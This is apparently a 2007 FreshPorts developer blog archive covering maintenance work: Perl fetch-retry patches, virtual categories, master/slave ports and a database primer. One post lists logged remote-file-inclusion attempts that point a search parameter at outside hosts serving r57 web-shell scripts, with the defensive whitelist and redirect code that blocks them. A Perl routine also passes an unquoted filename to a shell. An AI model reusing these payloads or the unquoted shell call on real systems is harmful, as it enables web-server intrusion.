FreshSource and FreshPorts back on the same server

October 7th, 2007

It was quite some time ago that I [finally] moved FreshPorts onto the new server. Today I moved FreshSource over too. Both websites use the same database instance. That is, each website is a different view of the same database.

Now that FreshSource is over here, we should be able to start doing a lot of things we’ve been unable to do before now. There was no reason for the delay. It just didn’t happen.

If you’re interested in getting FreshSource “filled out”, start now. All the FreshPorts source is online.

p5-Text-CSV_XS is missing

October 7th, 2007

Late last night, I wrote about a problem with virtual categories. I’ve been unable to reproduce the problem in test. But I did find the problem in production.

[dan@supernews:/usr/websites/freshports.org/scripts] $ touch ../dynamic/www.en.ports.categories
[dan@supernews:/usr/websites/freshports.org/scripts] $ sh process_www_en_ports_categories.sh
about to fetch: fetch -q -o /usr/websites/freshports.org/dynamic/caching/tmp/categories http://www.freebsd.org/cgi/cvsweb.cgi/~checkout~/www/en/ports/categories?rev=HEAD&content-type=text/plain
Can’t locate Text/CSV_XS.pm in @INC (@INC contains: /usr/local/lib/perl5/5.8.8/BSDPAN /usr/local/lib/perl5/site_perl/5.8.8/mach /usr/local/lib/perl5/site_perl/5.8.8 /usr/local/lib/perl5/site_perl /usr/local/lib/perl5/5.8.8/mach /usr/local/lib/perl5/5.8.8 .) at categories_update_descriptions.pl line 23.
BEGIN failed–compilation aborted at categories_update_descriptions.pl line 23.
[dan@supernews:/usr/websites/freshports.org/scripts] $

Well. That seems to be quite a let down. Who owns that file? Let me check test:

$ locate CSV_XS.pm
/usr/local/lib/perl5/site_perl/5.8.8/mach/Text/CSV_XS.pm
$ pkg_info -W /usr/local/lib/perl5/site_perl/5.8.8/mach/Text/CSV_XS.pm
/usr/local/lib/perl5/site_perl/5.8.8/mach/Text/CSV_XS.pm was installed by package p5-Text-CSV_XS-0.23

That means we are missing p5-Text-CSV_XS in production. That is easy enough to add in.

Done. Fixed. Let’s wait for the next commit.

BTW: I noticed that www/en/ports/categories has a few slight problems:

tcl - present, but no ports exist in this category
tk - same as above
geography - should be present, but is not
spanish - same as above

The first two issue arose with revision 1.34.

I sent in a patch for the last two issues. That in itself will be a good test of the above fix to FreshPorts.

Virtual categories get no respect

October 6th, 2007

After all I’ve written about virtual categories, it seems I still don’t have them right.

The code is there:

$ grep -l www/en/ports/categories *
process_www_en_ports_categories.sh
special_processing_files.pm

but things are still not being updated. If you look at the list of categories, sort by Description, you will find several with a description of “This is a virtual category. No description is available.”

I’ll have to find out why. The processing of each cvs-all email is logged and kept for quite some time (I have logs dating back to Nov 2006) just in case I need to review something like this. Something isn’t quite right. I’ll find out what.

Odd way to break in

October 2nd, 2007

Some people like to break into systems. Some like to find vulnerabilities. The good ones will tell you about the vulnerability so you can fix. Many won’t.

Then there are the script kiddies. They don’t know much. They know how to run scripts.

Lately, I’ve been seeing these requests to the FreshPorts website:

/search.php?stype=http://0x00013.50webs.org/tesgcc.txt?
/search.php?stype=http://0x0134.lan.io/pb.php?
/search.php?stype=http://0xg3458.hub.io/pb.php?
/search.php?stype=http://amygirl.3-hosting.net/cs.txt?
/search.php?stype=http://amygirl.siteburg.com/images/cs.txt?
/search.php?stype=http://amygirl.webs.io/pb.php?
/search.php?stype=http://amyru.h18.ru/images/cs.txt?
/search.php?stype=http://andravarldar.se/cmd?
/search.php?stype=http://tarcisiobr.kit.net/r57.txt?
/search.php?stype=http://users2.TitanicHost.com/ninagirl/pb.txt?
/search.php?stype=http://www.by-kaos.org/r57.txt?
/search.php?stype=http://www.etriple.com/sc/comandi/r57.txt?
/search.php?stype=http://www.evilc0der.com/r57.txt?
/search.php?stype=http://www.oxred.kit.net/bye.txt?
/search.php?stype=http://www.ss3s.org/r57.txt?
/search.php?stype=http://wwww.ypu.com/r57.txt?
/search.php?stype=http://x0.741.com/pb.txt?

What’s in these files? Something like this.

Where are they coming from? All over the place. Here is a list sorted by IP address.

As for these types of requests, I see them in the logs, I think about them. I know it’s not a problem because that particular field of the search results is well sanitized. Only certain values are accepted. If you supply a non-recognized value, you get told:

something terrible has happened!

That happens through code like this:

switch ($stype) {
   case SEARCH_FIELD_NAME:
   case SEARCH_FIELD_PACKAGE:
   case SEARCH_FIELD_LATEST_LINK:
   case SEARCH_FIELD_SHORTDESCRIPTION:
   case SEARCH_FIELD_LONGDESCRIPTION:
   case SEARCH_FIELD_DEPENDS_BUILD:
   case SEARCH_FIELD_DEPENDS_LIB:
   case SEARCH_FIELD_DEPENDS_RUN:
   case SEARCH_FIELD_DEPENDS_ALL:
   case SEARCH_FIELD_MAINTAINER:
   case SEARCH_FIELD_COMMITTER:
   case SEARCH_FIELD_PATHNAME:
   case SEARCH_FIELD_COMMITMESSAGE:
   # all is well.  we have a valid value.
      break;

   default:
      # bad value.
      # ERROR
      syslog(LOG_ERR, 'bad search string: ' . $_SERVER['QUERY_STRING']);
      die('something terrible has happened!');
}

That’s sufficient for what I needed. But now I’m getting annoyed. I’ve been redirecting the IP addresses elsewhere, but I’ve given up on that now. I had been doing something like this:

RewriteEngine On
RewriteCond %{REMOTE_ADDR} 59.56.116.171   [OR]
RewriteCond %{REMOTE_ADDR} 172.188.236.232 [OR]
RewriteCond %{REMOTE_ADDR} 202.101.107.120 [OR]
...
RewriteCond %{REMOTE_ADDR} 90.128.89.206   [OR]
RewriteCond %{REMOTE_ADDR} 82.42.160.16    [OR]
RewriteCond %{REMOTE_ADDR} 194.104.99.10
RewriteRule .* http://news.example.org/odd-way-to-break-in/ R=permanent]

This has the disadvantage of requiring manual intervention to amend the list and tapping Apache on the shoulder. It is precise in that redirects the kiddies if they try accessing http://www.freshports.org/ . I had thought of blocking the IP addresses from the entire server (all websites) by using a cronjob and a firewall rule (simliar to how I dealt with an odd DoS attack).

This morning, I decided I’d try something else. I’d redirect from within the code. Hence this patch:

if (substr($stype, 0, 7) === 'http://') {
   # redirect their ass
   header('Location: http://news.freshports.org/2007/10/02/odd-way-to-break-in/');
   exit;
}

This keeps them away from the server, and has the following advantages:

  • automatic - I don’t do anything
  • Produces a 301 in the logs - they don’t get anywhere near the website

So much better…

when is a Makefile not a Makefile?

September 14th, 2007

This is not good:

$ file -kb /usr/home/dan/ports/www/p5-HTTP-Size/Makefile
Apple Old Partition data block size: 20069, first type: ${PORTSDIR}/www/p5-HTML-SimpleL, name: I \, number of blocks: 1953460746,

It should read:

$ file -kb /usr/home/dan/ports/sysutils/bacula-server/Makefile
ASCII English text

Why do I care? The file in question has been fetched from the FreeBSD repository (via cvsweb). I need to ensure it’s not an HTML error file. Or more correctly, that it is an ASCII file, not an HTML file. I want to know that I’ve fetched a proper result.

I used to do this:

sub LooksLikeAMakefile($) {
    my $Makefile = shift;
    my $Result   = 1;

    my $filetype = `file -b $Makefile`;
    chomp($filetype);

    print "$filetype\n";

    if (index($filetype, 'HTML', 0) != -1) {
        print "nope, that's HTML, not a Makefile as far as I'm concerned....\n";
        $Result = 0;
    }

    return $Result;
}

That usually worked. It makes sure that HTML appears somewhere in the output of the file command. The first example above fails in this code. Here is the patch I’m going to use instead:

sub LooksLikeAMakefile($) {
    my $Makefile = shift;
    my $Result   = 1;

    my $Command = "file -b $Makefile";

    my $filetype = `$Command`;
    chomp($filetype);

    print "\n$Command gives:\n";
    print "$filetype\n\n";

    # look for HTML at the start of the file output
    my $index = index($filetype, 'HTML', 0);
    print "index result " . $index . "\n";

    if ($index == 0) {
        print "nope, that's HTML, not a Makefile as far as I'm concerned....\n";
        $Result = 0;
    }

    return $Result;
}

This code is on my development server now.

What is the difference? I’m now checking that the HTML appears at the start of the file output, not just somewhere within the output. And I’m printing a bit more debugging output.

vuxml - fix

September 13th, 2007

This isn’t so much a fix for the vuxml problem mentioned previously as it is a fix for properly detecting and reporting fetch errors. The patch is pretty simple:

$ cvs di -u utilities.pm
Index: utilities.pm
===================================================================
RCS file: /home/repositories/freshports-1/scripts/utilities.pm,v
retrieving revision 1.16
diff -u -r1.16 utilities.pm
--- utilities.pm        13 Sep 2007 13:01:41 -0000      1.16
+++ utilities.pm        13 Sep 2007 13:43:33 -0000
@@ -74,9 +74,9 @@
                my $command = "sh $FreshPorts::Config::scriptpath/fetch-cvs-file.sh \
                                    $URL $SRCDIR $FILE $REVISION $SUFFIX 2>&1";
                print "about to fetch = '$command'";
                my $FetchResults = `$command`;
-               $result = $?;
-#              print "fetch result = $result\n";
-               if (($result >> 8)) {
+               my $code = $?;
+               print "fetch result = $code\n";
+               if (($code >> 8)) {
                        #
                        # This might be a nice place to retry a fetch, or send an email
                        #

It is not shown, but $result is returned by this function. It was being overwritten by the fetch command. With this change, we use $code instead of $result for the fetch, thereby ensuring that this code segment works correctly:

    my $result = 0;

    my $FetchAttempts = $FreshPorts::Config::Fetch_Retry_Limit;

    while ($FetchAttempts) {
...
    # if we succeeded in our fetch..
    if ($FetchAttempts) {
        $result = 1;
    }

    return $result;

I’ll be putting this code into production soon.

vuxml configuration still not right

September 13th, 2007

This morning portaudit told me I needed to upgrade PHP5 on a few servers. Again, I checked FreshPorts to see if a fix was in. Apparently it was. Unfortunately, it was wrong.

Checking the version of vuln.xml in the ports tree, I found:

$ grep ‘$FreeBSD’ ports/security/vuxml/vuln.xml
$FreeBSD: ports/security/vuxml/vuln.xml,v 1.1416 2007/09/11 19:40:02 remko Exp $

It should have 1.1417.

Checking the processing log of that commit, I can see that the system had trouble fetching the new vuln.txt file via cvsweb. The script tried 5 times to grab the file between 01:50:44 and 01:51:26. That’s not a long period of time.

The issue arises because cvsweb has a direct NFS mount of repoman (the main cvs repository). Thus, if a fetch by FreshPorts fails, well, I don’t know why that happens.

I have a patch that’s been sitting on my development server for a while:

$ cvs di -uN utilities.pm
Index: utilities.pm
===================================================================
RCS file: /home/repositories/freshports-1/scripts/utilities.pm,v
retrieving revision 1.15
diff -u -r1.15 utilities.pm
--- utilities.pm        27 Jun 2007 02:40:26 -0000      1.15
+++ utilities.pm        13 Sep 2007 12:21:20 -0000
@@ -68,7 +68,7 @@

   my $result = 0;

-   my $FetchAttempts = 5;
+   my $FetchAttempts = $FreshPorts::Config::Fetch_Retry_Limit;

   while ($FetchAttempts) {
      my $command = "sh $FreshPorts::Config::scriptpath/fetch-cvs-file.sh $URL $DESTDIR \
                                    $SRCDIR $FILE $REVISION $SUFFIX 2>&1";
@@ -89,7 +89,7 @@

      Sys::Syslog::syslog('warning', \
              "sleeping after fetch failed for ($DESTDIR $SRCDIR $FILE)");
      print "fetch failed, sleeping...\n";
-      sleep 10;
+     sleep $FreshPorts::Config::Fetch_Sleep_Time;
       $FetchAttempts--;

    } else {

With this patch, I can manually configure the number of fetch retries and the sleep interval between attempts. At present, I’m using this on my development server:

$ grep Fetch config.pm
$FreshPorts::Config::Fetch_Retry_Limit = 10;
$FreshPorts::Config::Fetch_Sleep_Time  = 120;

This strategy will sleep for 2 minutes after a failed fetch. It will attempt to fetch 10 times.

There is another problem here. Why did FreshPorts not error out when the fetch failed? The commit should have been marked as requiring a refresh and the processing of the security/vuxml/vuln.xml file should never have occurred. In which case, I would have noticed the unrefreshed port in the morning, and manually refreshed it, thus triggering the usual vuxml processing.

The problem did not occur on my development server (which has the above code) located in Jupiter, Florida. Nor did it occur on the BETA server in New York City. This may have been a local network issue affecting only the production server (in San Jose).

I’ll move the above patch into production and see if the problem occurs again. I’ll also do some more testing to make sure a port is marked as refresh needed if a fetch failure occurs.

vuxml - missing configuration items

September 11th, 2007

After my overnight security report audit came in, I noticed that Apache needed to be upgraded. I went to FreshPorts to see if a fix had been committed. While there, I noticed a lack of vuxml skulls against the latest versions of Apache. Checking the BETA website, I saw it was correctly marked. More digging found the problem. In the process, I improved some error reporting in the scripts so that this problem should be brought to my attention much sooner.

Things should be back to normal now.

master / slave relationships

August 25th, 2007

As reported by sem@, there is a problem with the display of master/slave relationships within FreshPorts. The relationship is stored in the ports table, with the master_port attribute being a pointer to the master port. This text field typically has values such as this:

freshports.org=#   SELECT DISTINCT(master_port)
freshports.org-#     FROM ports_active
freshports.org-# where master_port <> ”
freshports.org-# AND  master_port not like ‘/usr/home/dan/%’
freshports.org-# ORDER BY master_port
freshports.org-#    LIMIT 10;
       master_port
————————–
 archivers/unrar
 audio/aylet
 audio/festalon
 audio/festvox-us1-mbrola
 audio/gbsplay
 audio/gqmpeg
 audio/mbrola
 audio/napster
 audio/scrobbler
 audio/timidity++
(10 rows)

freshports.org=#

The query to find any slave ports of a given port is:

SELECT id          AS slave_port_id,
       name        AS slave_port_name,
       category_id AS slave_category_id,
       category    AS slave_category_name
  FROM ports_active
 WHERE master_port = 'sysutils/bacula-server'
ORDER BY slave_category_name, slave_port_name

Which, on my development server at home, for sysutils/bacula-server gives:

 slave_port_id | slave_port_name | slave_category_id | slave_category_name
---------------+-----------------+-------------------+---------------------
         13986 | bacula-client   |                20 | sysutils
(1 row)

The problem is: bacula-server is not listing bacula-client as a slave port. For that matter, in production, bacula-client isn’t listing bacula-server as its master port either. Strange. Very strange. It must be something very simple that has gone wrong here. This has worked in the past.

FreshPorts determines the MASTERPORT through make -V magic. Something like this:

[dan@ngaio:~/ports/sysutils/bacula-client] $ make -V MASTERPORT \
PORTSDIR=~/ports LOCALBASE=/nonexistentlocal X11BASE=/nonexistentx
sysutils/bacula-server
[dan@ngaio:~/ports/sysutils/bacula-client] $

This magic is accomplished with this patch:

$ less ~/bin/bsd.port.mk.master-slave-patch
--- bsd.port.mk 10 Jun 2004 07:30:19 -0000      1.491
+++ bsd.port.mk 22 Jun 2004 13:48:33 -0000
@@ -913,6 +913,16 @@

 MASTERDIR?=    ${.CURDIR}

+# Try to determine if we are a slave port.  These variables are used by
+# FreshPorts and portsmon, but not yet by the ports framework itself.
+.if ${MASTERDIR} != ${.CURDIR}
+IS_SLAVE_PORT?=        yes
+MASTERPORT?=   ${MASTERDIR:C/[^\/]+\/\.\.\///:C/[^\/]+\/\.\.\///:C/^.*\/([^\/]+\/[^\/]+)$/\1/}
+.else
+IS_SLAVE_PORT?=        no
+MASTERPORT?=
+.endif
+
 # If they exist, include Makefile.inc, then architecture/operating
 # system specific Makefiles, then local Makefile.local.

So something, somewhere has allowed this information to be wrong. A few days ago, I did notice that my cvsup crontab was going wrong and was not correctly patching the file after the upgrade. Perhaps that was it.

Running a few commits manually shows that is the problem. An unpatched Mk/*.

I’ll work on getting that fixed and then run a script to check for a master port for each port.

FreshPorts database primer

August 3rd, 2007

This is a starting introduction to the FreshPorts database. Hopefully it will prompt questions. Ask.

The key data component of FreshPorts is the commit. These are stored in the commit_log table. Each commit affects one or more files, known in the database as elements.

The elements table is a self-referencing table and represents the files and directories of the source repository. Here are a few entries from that table:

freshports.org=# select *, element_pathname(id) from element order by id limit 10;
 id |   name   | parent_id | directory_file_flag | status |        element_pathname
----+----------+-----------+---------------------+--------+--------------------------------
  1 | ports    |           | D                   | A      | /ports
  2 | editors  |         1 | D                   | A      | /ports/editors
  3 | yudit    |         2 | D                   | A      | /ports/editors/yudit
  4 | Makefile |         3 | F                   | A      | /ports/editors/yudit/Makefile
  5 | pkg      |         3 | D                   | A      | /ports/editors/yudit/pkg
  6 | DESCR    |         5 | F                   | D      | /ports/editors/yudit/pkg/DESCR
  7 | files    |         3 | D                   | A      | /ports/editors/yudit/files
  8 | md5      |         7 | F                   | D      | /ports/editors/yudit/files/md5
  9 | www      |         1 | D                   | A      | /ports/www
 10 | quanta   |         9 | D                   | D      | /ports/www/quanta
(10 rows)

freshports.org=#

To relate a commit to the files it touches, the commit_log_ports table is used.

Ports are just a special case of abstraction. The Ports table contains data taken from each Makefile for the port in question. For this, “make -V” is used.

Ports are also elements. Using the element ids from the above query, here are the ports that pertain to those elements:

The key data component of FreshPorts is the commit. These are stored in the commit_log table. Each commit affects one or more files, known in the database as elements.

The elements table is a self-referencing table and represents the files and directories of the source repository. Here are a few entries from that table:

freshports.org=# select id, element_id, category_id, short_description from ports
where element_id between 1 and 10;
 id | element_id | category_id |                 short_description
----+------------+-------------+----------------------------------------------------
  1 |          3 |           1 | Multi-lingual unicode text editor with TTF support
  2 |         10 |           2 | Comprehensive html/website development environment
(2 rows)

freshports.org=#

Some commits affect ports. This relationship is maintained in the commit_log_ports table.

The categories table is what you think it is:

freshports.org=# select id, element_id, name from categories order by name;
 id  | element_id |     name
-----+------------+---------------
  85 |     171607 | accessibility
  64 |            | afterstep
  88 |     159346 | arabic
  23 |        350 | archivers
  26 |        410 | astro
  25 |        386 | audio
  42 |       2710 | benchmarks
  36 |        869 | biology
  35 |        830 | cad
  39 |       1660 | chinese
  41 |       2191 | comms
  27 |        423 | converters
  32 |        582 | databases
  33 |        802 | deskutils
  10 |         84 | devel
  84 |     148762 | dns
   1 |          2 | editors
  63 |            | elisp
  22 |        245 | emulators
  54 |     118514 | finance
  47 |      16545 | french
  13 |        140 | ftp
   3 |         18 | games
 118 |            | geography
  44 |       3747 | german
  58 |            | gnome
 101 |            | gnustep
   4 |         29 | graphics
  96 |            | hamradio
  77 |            | haskell
  46 |      11329 | hebrew
  51 |     118517 | hungarian
  62 |            | ipv6
   6 |         39 | irc
  12 |        129 | japanese
  34 |        815 | java
  55 |            | kde
 117 |            | kld
  37 |       1109 | korean
  15 |        171 | lang
  66 |            | linux
  90 |            | lisp
  19 |        201 | mail
  16 |        176 | math
  45 |       6412 | mbone
   7 |         42 | misc
  52 |     118520 | multimedia
   8 |         50 | net
  95 |     229588 | net-im
  92 |     173566 | net-mgmt
  98 |     236506 | net-p2p
  17 |        179 | news
  76 |            | offix
  40 |       2143 | palm
  93 |            | paralell
  68 |            | parallel
  89 |            | pear
  94 |            | perl
  59 |            | perl5
  87 |            | php
  50 |      58316 | picobsd
  69 |            | plan9
  82 |     148764 | polish
 111 |     265340 | ports-mgmt
  53 |     118523 | portuguese
  24 |        360 | print
  57 |            | python
  74 |            | ruby
  97 |            | rubygems
  31 |        577 | russian
  83 |            | scheme
  48 |      56065 | science
   5 |         34 | security
  29 |        465 | shells
 100 |            | spanish
  20 |        218 | sysutils
  70 |            | tcl80
  72 |            | tcl81
  71 |            | tcl82
  60 |            | tcl83
  80 |            | tcl84
  18 |        188 | textproc
  78 |            | tk42
  73 |            | tk80
  61 |            | tk82
  65 |            | tk83
  79 |            | tk84
  75 |            | tkstep80
  49 |      57265 | ukrainian
  11 |         94 | vietnamese
  56 |            | windowmaker
   2 |          9 | www
  21 |        231 | x11
  28 |        428 | x11-clocks
 115 |     278073 | x11-drivers
  30 |        516 | x11-fm
  38 |       1229 | x11-fonts
  43 |       3321 | x11-servers
  91 |     171611 | x11-themes
   9 |         55 | x11-toolkits
  14 |        147 | x11-wm
  81 |            | xfce
  67 |            | zope
(103 rows)

freshports.org=

You will notice that categories, like ports, have an element_id.

One of the key features of FreshPorts is the notification. Users select what they wish to monitor and add it to their watch list. A watch list consists of a watch_list_id and an element_id.

freshports.org=# select * from watch_list_element limit 10;
 watch_list_id | element_id
---------------+------------
          4000 |        916
          4334 |     112921
          4334 |      90346
          4334 |      88170
          4334 |     101671
          3105 |      57670
          3105 |      13030
          3105 |      68999
          3105 |       2487
          3105 |      68994
(10 rows)

freshports.org=#

In turn, each watch list is owned by a user. Users can have multiple watch lists:

freshports.org=# select id, user_id, name from watch_list order by user_id limit 10;
  id   | user_id |  name
-------+---------+--------
 10276 |       1 | stuff
 10275 |       1 | things
  8609 |       2 | main
 10277 |       2 | other
  1247 |       3 | main
  1248 |       4 | main
  1249 |       5 | main
  1250 |       6 | main
  1251 |       7 | main
     4 |       9 | main
(10 rows)

freshports.org=#